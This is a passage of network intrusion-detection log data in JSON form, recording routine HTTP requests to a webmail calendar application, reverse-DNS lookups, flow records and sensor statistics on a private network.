rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:22:32.740698+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.740787+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.753213+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12947,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:22:32.763804+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":13}} {"timestamp":"2020-02-29T00:22:32.764123+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:22:32.786769+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.864442+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56092,"proto":"UDP","dns":{"type":"answer","id":12947,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.864442+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56092,"proto":"UDP","dns":{"type":"answer","id":12947,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.888088+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53767,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62035,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.999298+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53767,"proto":"UDP","dns":{"type":"answer","id":62035,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.999298+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53767,"proto":"UDP","dns":{"type":"answer","id":62035,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:22:33.000123+0000","event_type":"stats","stats":{"uptime":15005,"capture":{"kernel_packets":139386,"kernel_drops":0},"decoder":{"pkts":139404,"bytes":95696369,"invalid":194,"ipv4":137843,"ipv6":10,"ethernet":139404,"raw":0,"null":0,"sll":0,"tcp":132311,"udp":5323,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2867,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2883,"synack":2874,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1886,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2435,"failed_udp":116},"tx":{"http":4842,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2517}},"flow_mgr":{"closed_pruned":2836,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":215062,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:33.031742+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:22:33.031742+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":5}} {"timestamp":"2020-02-29T00:22:33.036872+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044}} 
{"timestamp":"2020-02-29T00:22:33.036872+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":6}} {"timestamp":"2020-02-29T00:22:34.000162+0000","flow_id":202995961277195,"event_type":"flow","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":17,"bytes_toserver":2308,"bytes_toclient":12401,"start":"2020-02-29T00:19:53.109323+0000","end":"2020-02-29T00:21:32.815837+0000","age":99,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1a","tcp_flags_tc":"1f","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:37.471121+0000","flow_id":1506488481224280,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52962,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":0}} {"timestamp":"2020-02-29T00:22:37.472111+0000","flow_id":1879111253891026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52966,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":0}} {"timestamp":"2020-02-29T00:22:37.472155+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52964,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":1}} 
{"timestamp":"2020-02-29T00:22:37.766816+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":14}} {"timestamp":"2020-02-29T00:22:38.036551+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":5}} {"timestamp":"2020-02-29T00:22:38.041842+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":2986,"tx_id":6}} {"timestamp":"2020-02-29T00:22:40.000200+0000","event_type":"stats","stats":{"uptime":15012,"capture":{"kernel_packets":139739,"kernel_drops":0},"decoder":{"pkts":139744,"bytes":95945702,"invalid":194,"ipv4":138181,"ipv6":10,"ethernet":139744,"raw":0,"null":0,"sll":0,"tcp":132642,"udp":5330,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2872,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2888,"synack":2879,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1891,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2438,"failed_udp":116},"tx":{"http":4872,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2520}},"flow_mgr":{"closed_pruned":2837,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18511,"memcap_state":0,"memc
ap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:41.398092+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54228,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24532,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:41.509947+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54228,"proto":"UDP","dns":{"type":"answer","id":24532,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:41.509947+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54228,"proto":"UDP","dns":{"type":"answer","id":24532,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:41.540149+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122}} {"timestamp":"2020-02-29T00:22:41.540149+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:22:43.003183+0000","flow_id":2063545735567906,"event_type":"flow","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":1970,"bytes_toclient":12607,"start":"2020-02-29T00:21:31.907810+0000","end":"2020-02-29T00:21:42.154980+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:46.541552+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52968,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":127,"tx_id":0}} 
{"timestamp":"2020-02-29T00:22:48.000175+0000","event_type":"stats","stats":{"uptime":15020,"capture":{"kernel_packets":139767,"kernel_drops":0},"decoder":{"pkts":139773,"bytes":95948805,"invalid":194,"ipv4":138208,"ipv6":10,"ethernet":139773,"raw":0,"null":0,"sll":0,"tcp":132667,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2838,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18841,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:50.000294+0000","flow_id":436341541717765,"event_type":"flow","src_ip":"192.168.10.130","src_port":34228,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":66,"pkts_toclient":85,"bytes_toserver":8194,"bytes_toclient":105657,"start":"2020-02-29T00:21:44.345861+0000","end":"2020-02-29T00:21:49.809612+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:55.000161+0000","event_type":"stats","stats":{"uptime":15027,"capture":{"kernel_packets":139773,"kernel_drops":0},"decoder":{"pkts":139776,"bytes":95949003,"invalid":194,"ipv4":138211,"ipv6":10,"ethernet":139776,"raw":0,"null":0,"sll":0,"tcp":132670,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2839,"new_pruned":17,"est_pruned":2497,"
bypassed_pruned":0,"flows_checked":5,"flows_notimeout":0,"flows_timeout":5,"flows_timeout_inuse":5,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18841,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:58.001576+0000","flow_id":2139845830940751,"event_type":"flow","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":2278,"bytes_toclient":6262,"start":"2020-02-29T00:21:52.170063+0000","end":"2020-02-29T00:21:57.196929+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:58.001929+0000","flow_id":1200270195341367,"event_type":"flow","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1676,"bytes_toclient":4695,"start":"2020-02-29T00:21:52.178231+0000","end":"2020-02-29T00:21:57.194742+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:59.000384+0000","flow_id":2155793044521586,"event_type":"flow","src_ip":"192.168.10.81","src_port":52954,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":272,"bytes_toclient":206,"start":"2020-02-29T00:21:52.180850+0000","end":"2020-02-29T00:21:58.127221+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:00.000403+0000","flow_id":744964991983055,"event_type":"flow","src_ip":"192.168.10.122","src_port":46162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:59.499151+0000","end":"2020-02-29T00:17:59.609546+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:02.003132+0000","event_type":"stats","stats":{"uptime":15034,"capture":{"kernel_packets":139773,"kernel_drops":0},"decoder":{"pkts":139776,"bytes":95949003,"invalid":194,"ipv4":138211,"ipv6":10,"ethernet":139776,"raw":0,"null":0,"sll":0,"tcp":132670,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,